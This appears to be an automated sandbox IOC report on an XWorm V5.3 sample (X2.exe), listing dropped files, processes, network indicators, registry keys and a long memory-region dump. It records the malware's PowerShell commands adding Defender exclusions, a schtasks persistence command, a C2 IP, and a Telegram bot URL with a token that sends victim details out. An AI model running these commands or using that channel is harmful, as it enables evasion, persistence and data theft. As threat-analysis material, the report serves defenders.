IOC Report
X2.exe

loading gif

Files

File Path
Type
Category
Malicious
X2.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Roaming\explorer.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\Log.tmp
Generic INItialization configuration [WIN]
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pfdzrbz.hmr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1twhqbul.0cj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ykowicr.nig.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a3xxvqq.fu3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5nbalah.m0p.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j55kqhiw.eag.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nizxkupe.dmm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oojkmklw.2fk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rubhzaz3.ru5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sk4mmj53.3yj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0dxijgf.tcm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1o5dnxb.rve.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf4gnsri.10x.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upvh04it.zrg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0z0f4qt.bvs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykqx4vzq.mom.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 23:54:18 2024, mtime=Tue Apr 23 23:54:18 2024, atime=Tue Apr 23 23:54:18 2024, length=50688, window=hide
dropped
There are 12 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\X2.exe
"C:\Users\user\Desktop\X2.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X2.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"
malicious
C:\Users\user\AppData\Roaming\explorer.exe
C:\Users\user\AppData\Roaming\explorer.exe
malicious
C:\Users\user\AppData\Roaming\explorer.exe
"C:\Users\user\AppData\Roaming\explorer.exe"
malicious
C:\Users\user\AppData\Roaming\explorer.exe
"C:\Users\user\AppData\Roaming\explorer.exe"
malicious
C:\Users\user\AppData\Roaming\explorer.exe
C:\Users\user\AppData\Roaming\explorer.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
91.92.252.220
malicious
127.0.0.1
malicious
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
unknown
http://nuget.org/NuGet.exe
unknown
https://api.telegram.org
unknown
https://api.telegram.org/bot
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=96664
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://github.com/Pester/Pester
unknown
http://crl.m
unknown
http://crl.m3
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://api.telegrP
unknown
https://aka.ms/pscore68
unknown
http://api.telegram.org
unknown
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ABCC62BF1F171CE9AAF13%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FS1PX1XW%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3
149.154.167.220
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
api.telegram.org
149.154.167.220

IPs

IP
Domain
Country
Malicious
91.92.252.220
unknown
Bulgaria
malicious
127.0.0.1
unknown
unknown
malicious
208.95.112.1
ip-api.com
United States
149.154.167.220
api.telegram.org
United Kingdom

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
explorer
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2C01000
trusted library allocation
page read and write
malicious
2BCB000
trusted library allocation
page read and write
malicious
2B61000
trusted library allocation
page read and write
malicious
852000
unkown
page readonly
malicious
196DB8A1000
trusted library allocation
page read and write
91F6EFD000
stack
page read and write
7FFE7E590000
trusted library allocation
page read and write
4F1000
stack
page read and write
1B4D0000
heap
page read and write
7FFE7E1E3000
trusted library allocation
page execute and read and write
196F25C5000
heap
page read and write
7FFE7E391000
trusted library allocation
page read and write
B90000
heap
page read and write
196DB70E000
trusted library allocation
page read and write
82A000
heap
page read and write
1C301869000
trusted library allocation
page read and write
7FFE7E244000
trusted library allocation
page read and write
1425000
heap
page read and write
7FFE7E680000
trusted library allocation
page read and write
7FFE7E530000
trusted library allocation
page read and write
196DB700000
trusted library allocation
page read and write
7DF40F6D0000
trusted library allocation
page execute and read and write
1CC0E000
stack
page read and write
7FFE7E3BA000
trusted library allocation
page read and write
91F65B3000
stack
page read and write
110E000
stack
page read and write
6E1000
heap
page read and write
1E8649A0000
heap
page read and write
196F21D8000
heap
page read and write
7FFE7E3F0000
trusted library allocation
page read and write
7FFE7E490000
trusted library allocation
page read and write
7FFE7E63D000
trusted library allocation
page read and write
1E84DBB9000
trusted library allocation
page read and write
1C3796E0000
trusted library allocation
page read and write
7FFE7E380000
trusted library allocation
page read and write
7FFE7E520000
trusted library allocation
page read and write
2BAA000
trusted library allocation
page read and write
7FFE7E5D0000
trusted library allocation
page read and write
1520000
heap
page execute and read and write
120F000
stack
page read and write
12353000
trusted library allocation
page read and write
2C8C000
trusted library allocation
page read and write
7FFE7E5A0000
trusted library allocation
page read and write
7FFE7E530000
trusted library allocation
page read and write
16D16C84000
heap
page read and write
7FFE7E5F0000
trusted library allocation
page read and write
91F000
stack
page read and write
FC0000
heap
page execute and read and write
1E84D8BD000
trusted library allocation
page read and write
1CF0B000
stack
page read and write
1CD0A000
stack
page read and write
1C310001000
trusted library allocation
page read and write
1E84DAD4000
trusted library allocation
page read and write
A52B94A000
stack
page read and write
7FFE7E306000
trusted library allocation
page execute and read and write
1BA3D000
heap
page read and write
6B2773000
stack
page read and write
7FFE7E4E0000
trusted library allocation
page read and write
7FFE7E4D0000
trusted library allocation
page read and write
196DBB54000
trusted library allocation
page read and write
7FFE7E520000
trusted library allocation
page read and write
91F65FF000
stack
page read and write
196D812E000
heap
page read and write
7FFE7E3C0000
trusted library allocation
page read and write
16D30BEB000
heap
page read and write
196E9DE1000
trusted library allocation
page read and write
1C377E76000
heap
page read and write
1E84A751000
heap
page read and write
1BB8E000
stack
page read and write
1C30130A000
trusted library allocation
page read and write
7FFE7E543000
trusted library allocation
page read and write
1C377E8E000
heap
page read and write
1C379EA0000
trusted library allocation
page read and write
7FFE7E470000
trusted library allocation
page read and write
7FFE7E3E0000
trusted library allocation
page execute and read and write
7FFE7E440000
trusted library allocation
page read and write
12B0000
heap
page read and write
22E0000
heap
page read and write
1B19E000
stack
page read and write
1E84A799000
heap
page read and write
16D16C00000
heap
page read and write
6B2BFE000
stack
page read and write
1C2B3000
stack
page read and write
566000
heap
page read and write
12F0000
heap
page read and write
1C379710000
heap
page readonly
7FFE7E564000
trusted library allocation
page read and write
7FFE7E4D0000
trusted library allocation
page read and write
7FFE7E600000
trusted library allocation
page read and write
1E85C371000
trusted library allocation
page read and write
16D19EDF000
trusted library allocation
page read and write
15B5B7F000
stack
page read and write
7FFE7E200000
trusted library allocation
page read and write
15B674C000
stack
page read and write
16D16C07000
heap
page read and write
7FFE7E5F0000
trusted library allocation
page read and write
F93000
trusted library allocation
page read and write
2EEE000
stack
page read and write
7FFE7E230000
trusted library allocation
page read and write
1C300001000
trusted library allocation
page read and write
7FFE7E440000
trusted library allocation
page read and write
2F91000
trusted library allocation
page read and write
7FFE7E500000
trusted library allocation
page read and write
16D18730000
heap
page read and write
16D28791000
trusted library allocation
page read and write
91F6E7E000
stack
page read and write
7E0000
trusted library allocation
page read and write
196F25DF000
heap
page read and write
7FFE7E3C1000
trusted library allocation
page read and write
244D000
trusted library allocation
page read and write
7FFE7E568000
trusted library allocation
page read and write
A90000
heap
page read and write
1E84D2BB000
trusted library allocation
page read and write
7FFE7E3E2000
trusted library allocation
page read and write
15B5979000
stack
page read and write
16D3076F000
heap
page read and write
1E84A710000
heap
page read and write
7FFE7E320000
trusted library allocation
page execute and read and write
7FFE7E2F6000
trusted library allocation
page execute and read and write
7FFE7E533000
trusted library allocation
page read and write
196D8210000
heap
page read and write
7FFE7E530000
trusted library allocation
page read and write
2100000
trusted library allocation
page read and write
6B2E37000
stack
page read and write
7FFE7E4F0000
trusted library allocation
page read and write
18B84E58000
heap
page read and write
6F0000
heap
page read and write
5B5000
heap
page read and write
A52AB77000
stack
page read and write
1C379790000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
196D8300000
trusted library allocation
page read and write
1C30133D000
trusted library allocation
page read and write
2CAF000
trusted library allocation
page read and write
7FFE7E4E0000
trusted library allocation
page read and write
196D8260000
trusted library section
page read and write
12351000
trusted library allocation
page read and write
196D8010000
heap
page read and write
7FFE7E300000
trusted library allocation
page execute and read and write
7FFE7E5EC000
trusted library allocation
page read and write
1290000
heap
page read and write
7FFE7E4F0000
trusted library allocation
page read and write
196F25D8000
heap
page read and write
7FFE7E1F0000
trusted library allocation
page read and write
4DE3E79000
stack
page read and write
1E84CF87000
trusted library allocation
page read and write
1C3796D0000
trusted library section
page read and write
7FFE7E65D000
trusted library allocation
page read and write
16D16C86000
heap
page read and write
7FFE7E542000
trusted library allocation
page read and write
18B84E50000
heap
page read and write
18B85110000
heap
page read and write
196DB713000
trusted library allocation
page read and write
7FFE7E3E4000
trusted library allocation
page read and write
12F98000
trusted library allocation
page read and write
1C300088000
trusted library allocation
page read and write
10F1000
stack
page read and write
7FFE7E3E0000
trusted library allocation
page read and write
1AE10000
heap
page read and write
7FFE7E63D000
trusted library allocation
page read and write
7FFE7E2D6000
trusted library allocation
page read and write
2C66000
trusted library allocation
page read and write
1C5CD000
heap
page read and write
196DB808000
trusted library allocation
page read and write
7FFE7E1E2000
trusted library allocation
page read and write
7FFE7E230000
trusted library allocation
page read and write
91F79CE000
stack
page read and write
7DF43E410000
trusted library allocation
page execute and read and write
196D8280000
trusted library allocation
page read and write
7FFE7E600000
trusted library allocation
page read and write
196DB7BF000
trusted library allocation
page read and write
7FFE7E420000
trusted library allocation
page read and write
1C300A52000
trusted library allocation
page read and write
1D00B000
stack
page read and write
DD5000
heap
page read and write
196F22F0000
heap
page read and write
7FFE7E5F0000
trusted library allocation
page read and write
16D18650000
trusted library allocation
page read and write
91F69F9000
stack
page read and write
7FFE7E1E4000
trusted library allocation
page read and write
16D30D57000
heap
page execute and read and write
6DE000
heap
page read and write
1C377DF5000
heap
page read and write
196DB6F2000
trusted library allocation
page read and write
16D18610000
heap
page readonly
1C377EB7000
heap
page read and write
7FFE7E1E4000
trusted library allocation
page read and write
196D9FD8000
trusted library allocation
page read and write
7FFE7E440000
trusted library allocation
page read and write
525000
heap
page read and write
7FFE7E3A0000
trusted library allocation
page read and write
7FFE7E580000
trusted library allocation
page read and write
3C0000
heap
page read and write
7FFE7E620000
trusted library allocation
page read and write
16D30FB2000
heap
page read and write
15B5333000
stack
page read and write
7FFE7E3C8000
trusted library allocation
page read and write
1C301E27000
trusted library allocation
page read and write
1C301387000
trusted library allocation
page read and write
7FFE7E510000
trusted library allocation
page read and write
1000000
heap
page read and write
196DBA18000
trusted library allocation
page read and write
1E864B41000
heap
page read and write
7FFE7E220000
trusted library allocation
page read and write
955000
heap
page read and write
7FFE7E382000
trusted library allocation
page read and write
7FFE7E1FB000
trusted library allocation
page read and write
1140000
heap
page read and write
2BE7000
trusted library allocation
page read and write
15B58FD000
stack
page read and write
1E84C0C0000
heap
page read and write
2490000
heap
page read and write
6B30BE000
stack
page read and write
7FFE7E4B0000
trusted library allocation
page read and write
6B27FD000
stack
page read and write
1C60B000
heap
page read and write
7FFE7E620000
trusted library allocation
page read and write
1E85C643000
trusted library allocation
page read and write
7FFE7E540000
trusted library allocation
page read and write
950000
heap
page read and write
1B15F000
stack
page read and write
1C3BC000
stack
page read and write
16D18C2D000
trusted library allocation
page read and write
196DBB4B000
trusted library allocation
page read and write
196D8080000
heap
page read and write
7FFE7E2D0000
trusted library allocation
page read and write
2F80000
heap
page read and write
196DB630000
trusted library allocation
page read and write
7FFE7E620000
trusted library allocation
page read and write
7FFE7E212000
trusted library allocation
page read and write
1B9FC000
heap
page read and write
15B5AF8000
stack
page read and write
16D18750000
heap
page read and write
7FFE7E3F0000
trusted library allocation
page read and write
7FFE7E240000
trusted library allocation
page read and write
7FFE7E54A000
trusted library allocation
page read and write
7FFE7E660000
trusted library allocation
page read and write
7FFE7E650000
trusted library allocation
page read and write
7FFE7E27C000
trusted library allocation
page execute and read and write
196DB624000
trusted library allocation
page read and write
11DE000
heap
page read and write
7FFE7E620000
trusted library allocation
page read and write
681000
heap
page read and write
6B3B8C000
stack
page read and write
1E84D471000
trusted library allocation
page read and write
1C60D000
heap
page read and write
530000
heap
page read and write
1C379DF3000
heap
page read and write
7FFE7E4E0000
trusted library allocation
page read and write
7FFE7E24C000
trusted library allocation
page execute and read and write
1B95F000
stack
page read and write
196DB615000
trusted library allocation
page read and write
1C377E7C000
heap
page read and write
196F21F0000
trusted library allocation
page read and write
196D8065000
heap
page read and write
1C3799A0000
heap
page execute and read and write
1BAD8000
heap
page read and write
196DB673000
trusted library allocation
page read and write
1C310021000
trusted library allocation
page read and write
7FFE7E4C0000
trusted library allocation
page read and write
196DB2CE000
trusted library allocation
page read and write
1B9E2000
heap
page read and write
D60000
heap
page read and write
196DBBA4000
trusted library allocation
page read and write
1E84D560000
trusted library allocation
page read and write
7FFE7E513000
trusted library allocation
page read and write
11DB000
heap
page read and write
652000
heap
page read and write
7FFE7E29C000
trusted library allocation
page execute and read and write
7FFE7E4A0000
trusted library allocation
page read and write
16D28761000
trusted library allocation
page read and write
610000
heap
page read and write
16D28781000
trusted library allocation
page read and write
7DF409F60000
trusted library allocation
page execute and read and write
9AE000
stack
page read and write
1110000
heap
page read and write
196D80C4000
heap
page read and write
196F256C000
heap
page read and write
114C000
heap
page read and write
67E000
heap
page read and write
7FFE7E390000
trusted library allocation
page read and write
196DB619000
trusted library allocation
page read and write
1C377E30000
heap
page read and write
243F000
stack
page read and write
1E84D065000
trusted library allocation
page read and write
16D19796000
trusted library allocation
page read and write
196DAD53000
trusted library allocation
page read and write
7FFE7E2CC000
trusted library allocation
page execute and read and write
196E9E1C000
trusted library allocation
page read and write
196F2137000
heap
page read and write
7FFE7E550000
trusted library allocation
page read and write
1C377DF0000
heap
page read and write
7FFE7E3CA000
trusted library allocation
page read and write
7FFE7E3C0000
trusted library allocation
page execute and read and write
1C300C07000
trusted library allocation
page read and write
7FFE7E660000
trusted library allocation
page read and write
6B2B79000
stack
page read and write
196D9DA0000
heap
page execute and read and write
7FFE7E5D0000
trusted library allocation
page read and write
16D18600000
trusted library allocation
page read and write
5C0000
heap
page read and write
1C3102E9000
trusted library allocation
page read and write
1E84A796000
heap
page read and write
7FFE7E390000
trusted library allocation
page read and write
7FFE7E570000
trusted library allocation
page read and write
16D30BC0000
heap
page read and write
7FFE7E650000
trusted library allocation
page read and write
1B930000
heap
page read and write
16D31029000
heap
page read and write
7FFE7E3D0000
trusted library allocation
page execute and read and write
196D8340000
trusted library allocation
page read and write
1178000
heap
page read and write
1B6DF000
stack
page read and write
9A1000
stack
page read and write
7FFE7E4C0000
trusted library allocation
page read and write
2C44000
trusted library allocation
page read and write
2C4E000
trusted library allocation
page read and write
1E84CF4F000
trusted library allocation
page read and write
16D196FD000
trusted library allocation
page read and write
16D16BC0000
heap
page read and write
7FFE7E4A1000
trusted library allocation
page read and write
7FFE7E470000
trusted library allocation
page read and write
8F0000
heap
page read and write
955000
heap
page read and write
7FFE7E232000
trusted library allocation
page read and write
7FFE7E680000
trusted library allocation
page read and write
196DB984000
trusted library allocation
page read and write
7FFE7E636000
trusted library allocation
page read and write
196D8295000
heap
page read and write
16D310C0000
trusted library allocation
page read and write
15B5BFE000
stack
page read and write
7FFE7E213000
trusted library allocation
page execute and read and write
6B2CFD000
stack
page read and write
7FFE7E3B0000
trusted library allocation
page read and write
196F24EE000
heap
page read and write
A52ABFA000
stack
page read and write
16D31021000
heap
page read and write
1E84D654000
trusted library allocation
page read and write
1E85C351000
trusted library allocation
page read and write
1C301E02000
trusted library allocation
page read and write
7FFE7E630000
trusted library allocation
page read and write
16D30F66000
heap
page read and write
A52AD7E000
stack
page read and write
6D0000
heap
page read and write
1E864B06000
heap
page read and write
1E84D40E000
trusted library allocation
page read and write
7FFE7E296000
trusted library allocation
page read and write
15B5779000
stack
page read and write
7FFE7E545000
trusted library allocation
page read and write
196D8270000
trusted library section
page read and write
63B000
heap
page read and write
7FFE7E550000
trusted library allocation
page read and write
7FFE7E400000
trusted library allocation
page read and write
7FFE7E200000
trusted library allocation
page read and write
91F6F7E000
stack
page read and write
A52A5DE000
stack
page read and write
7FFE7E562000
trusted library allocation
page read and write
7FFE7E4A0000
trusted library allocation
page read and write
1BE1E000
stack
page read and write
7FFE7E534000
trusted library allocation
page read and write
6B3B0E000
stack
page read and write
7FFE7E2E6000
trusted library allocation
page execute and read and write
196DBBB2000
trusted library allocation
page read and write
196DB707000
trusted library allocation
page read and write
15B68CC000
stack
page read and write
16D30D50000
heap
page execute and read and write
7FFE7E4D0000
trusted library allocation
page read and write
196DB6F4000
trusted library allocation
page read and write
1B99E000
stack
page read and write
1AF1E000
stack
page read and write
1E84DCB4000
trusted library allocation
page read and write
196F20FB000
heap
page read and write
196D9C2D000
heap
page read and write
1E864748000
heap
page read and write
12F93000
trusted library allocation
page read and write
196DBAB2000
trusted library allocation
page read and write
196DA9B8000
trusted library allocation
page read and write
16D30FAF000
heap
page read and write
7FFE7E450000
trusted library allocation
page read and write
196DB1EE000
trusted library allocation
page read and write
A52AAF8000
stack
page read and write
7FFE7E610000
trusted library allocation
page read and write
1AE0F000
stack
page read and write
1E84A722000
heap
page read and write
7FFE7E382000
trusted library allocation
page read and write
950000
heap
page read and write
6B3D0C000
stack
page read and write
7FFE7E310000
trusted library allocation
page execute and read and write
12443000
trusted library allocation
page read and write
16D31035000
heap
page read and write
7FFE7E569000
trusted library allocation
page read and write
1C37A10F000
heap
page read and write
7FFE7E200000
trusted library allocation
page read and write
1E84A718000
heap
page read and write
1E864B2C000
heap
page read and write
91F687E000
stack
page read and write
16D1A539000
trusted library allocation
page read and write
6B2F3B000
stack
page read and write
7FFE7E4B0000
trusted library allocation
page read and write
D66000
heap
page read and write
7FFE7E3B1000
trusted library allocation
page read and write
1AB90000
trusted library allocation
page read and write
1C37A000000
heap
page read and write
1C636000
heap
page read and write
1C3102EE000
trusted library allocation
page read and write
196DB49E000
trusted library allocation
page read and write
1C4BC000
stack
page read and write
1420000
heap
page read and write
7FFE7E570000
trusted library allocation
page read and write
91F6D7A000
stack
page read and write
196DAE6F000
trusted library allocation
page read and write
A52BA4C000
stack
page read and write
7FFE7E3B0000
trusted library allocation
page execute and read and write
1E864A81000
heap
page read and write
1C379D17000
heap
page read and write
1C377EBB000
heap
page read and write
196F263F000
heap
page read and write
1E864A1D000
heap
page read and write
196DB63F000
trusted library allocation
page read and write
7FFE7E57C000
trusted library allocation
page read and write
114A000
heap
page read and write
1E84E173000
trusted library allocation
page read and write
7FFE7E400000
trusted library allocation
page read and write
196DB6D1000
trusted library allocation
page read and write
7FFE7E530000
trusted library allocation
page read and write
7FFE7E4C0000
trusted library allocation
page read and write
AC0000
heap
page execute and read and write
1E84D0D7000
trusted library allocation
page read and write
124C3000
trusted library allocation
page read and write
A52ADFE000
stack
page read and write
F60000
trusted library allocation
page read and write
815000
heap
page read and write
1E84D2C4000
trusted library allocation
page read and write
1C30188F000
trusted library allocation
page read and write
1E85C639000
trusted library allocation
page read and write
A52AC78000
stack
page read and write
1C377E72000
heap
page read and write
7FFE7E202000
trusted library allocation
page read and write
196DA27D000
trusted library allocation
page read and write
7FFE7E2E0000
trusted library allocation
page execute and read and write
2120000
trusted library allocation
page read and write
16D30BD0000
heap
page read and write
16D30D80000
heap
page read and write
196DB851000
trusted library allocation
page read and write
7FFE7E240000
trusted library allocation
page read and write
16D30C88000
heap
page read and write
16D1A0AC000
trusted library allocation
page read and write
7FFE7E230000
trusted library allocation
page read and write
16D196F7000
trusted library allocation
page read and write
7DF4822F0000
trusted library allocation
page execute and read and write
2361000
trusted library allocation
page read and write
7FFE7E2A0000
trusted library allocation
page read and write
196F22C0000
heap
page execute and read and write
1C37A150000
heap
page read and write
7FFE7E630000
trusted library allocation
page read and write
7FFE7E3F0000
trusted library allocation
page execute and read and write
196D82D0000
trusted library allocation
page read and write
1E84C351000
trusted library allocation
page read and write
16D30D83000
heap
page read and write
67C000
heap
page read and write
16D30C3F000
heap
page read and write
196D9DB1000
trusted library allocation
page read and write
196D8390000
heap
page read and write
1E84C340000
heap
page read and write
1C301124000
trusted library allocation
page read and write
7FFE7E223000
trusted library allocation
page execute and read and write
1C301032000
trusted library allocation
page read and write
7FFE7E580000
trusted library allocation
page read and write
1C310308000
trusted library allocation
page read and write
1E84C1B0000
trusted library allocation
page read and write
16D18755000
heap
page read and write
E5C000
heap
page read and write
7FFE7E559000
trusted library allocation
page read and write
1C301163000
trusted library allocation
page read and write
4DE3F7E000
stack
page read and write
16D28A48000
trusted library allocation
page read and write
91F68FE000
stack
page read and write
16D19364000
trusted library allocation
page read and write
196DB8EB000
trusted library allocation
page read and write
7FFE7E330000
trusted library allocation
page execute and read and write
1E85C653000
trusted library allocation
page read and write
A52B9C9000
stack
page read and write
7FFE7E430000
trusted library allocation
page read and write
7FFE7E204000
trusted library allocation
page read and write
91F7AC7000
stack
page read and write
1E84E178000
trusted library allocation
page read and write
1C37A132000
heap
page read and write
1C3799C0000
heap
page read and write
7FFE7E656000
trusted library allocation
page read and write
1AFCE000
stack
page read and write
196DBAFB000
trusted library allocation
page read and write
1E84AAA5000
heap
page read and write
16D18620000
trusted library allocation
page read and write
16D30EA0000
heap
page execute and read and write
7DF43E430000
trusted library allocation
page execute and read and write
16D185D0000
trusted library section
page read and write
7FFE7E670000
trusted library allocation
page read and write
12448000
trusted library allocation
page read and write
7FFE7E4B0000
trusted library allocation
page read and write
1C300BEB000
trusted library allocation
page read and write
7FFE7E500000
trusted library allocation
page read and write
15B57FF000
stack
page read and write
1C301006000
trusted library allocation
page read and write
7FFE7E54C000
trusted library allocation
page read and write
7FFE7E340000
trusted library allocation
page execute and read and write
1C377E78000
heap
page read and write
196DAE13000
trusted library allocation
page read and write
7FFE7E1E0000
trusted library allocation
page read and write
1E84C1F0000
heap
page read and write
1E84CF5D000
trusted library allocation
page read and write
1C5C0000
heap
page read and write
7FFE7E4C0000
trusted library allocation
page read and write
7FFE7E1E3000
trusted library allocation
page execute and read and write
1C377E20000
trusted library section
page read and write
7FFE7E640000
trusted library allocation
page execute and read and write
1C379F20000
heap
page read and write
6B3D8E000
stack
page read and write
A52A59E000
stack
page read and write
18B84DD0000
heap
page read and write
1176000
heap
page read and write
196F20FD000
heap
page read and write
7FFE7E3A2000
trusted library allocation
page read and write
7FFE7E450000
trusted library allocation
page read and write
DA3000
heap
page read and write
7FFE7E490000
trusted library allocation
page read and write
CF0000
heap
page read and write
1E84C175000
heap
page read and write
A52B84E000
stack
page read and write
7FFE7E540000
trusted library allocation
page read and write
196DB59F000
trusted library allocation
page read and write
1E84A753000
heap
page read and write
7FFE7E210000
trusted library allocation
page read and write
7FFE7E420000
trusted library allocation
page read and write
16D186D0000
heap
page execute and read and write
196DBBD2000
trusted library allocation
page read and write
2C62000
trusted library allocation
page read and write
1C37A167000
heap
page read and write
196D8082000
heap
page read and write
196F22C7000
heap
page execute and read and write
15B53FE000
stack
page read and write
1005000
heap
page read and write
7FFE7E539000
trusted library allocation
page read and write
235D000
trusted library allocation
page read and write
A52A493000
stack
page read and write
2FA1000
trusted library allocation
page read and write
6B2AFF000
stack
page read and write
1430000
heap
page read and write
15B6847000
stack
page read and write
F80000
trusted library allocation
page read and write
7FFE7E3F8000
trusted library allocation
page read and write
1E0000
heap
page read and write
7FFE7E500000
trusted library allocation
page read and write
2CA1000
trusted library allocation
page read and write
1C634000
heap
page read and write
16D185A0000
heap
page read and write
1E864AF0000
heap
page read and write
1C379990000
heap
page execute and read and write
7FFE7E430000
trusted library allocation
page read and write
16D28A56000
trusted library allocation
page read and write
7FFE7E4F0000
trusted library allocation
page read and write
1E85C381000
trusted library allocation
page read and write
1AE8E000
stack
page read and write
E1E000
heap
page read and write
1E84D2B3000
trusted library allocation
page read and write
1E864BC0000
trusted library allocation
page read and write
7FFE7E578000
trusted library allocation
page read and write
196D807C000
heap
page read and write
7FFE7E410000
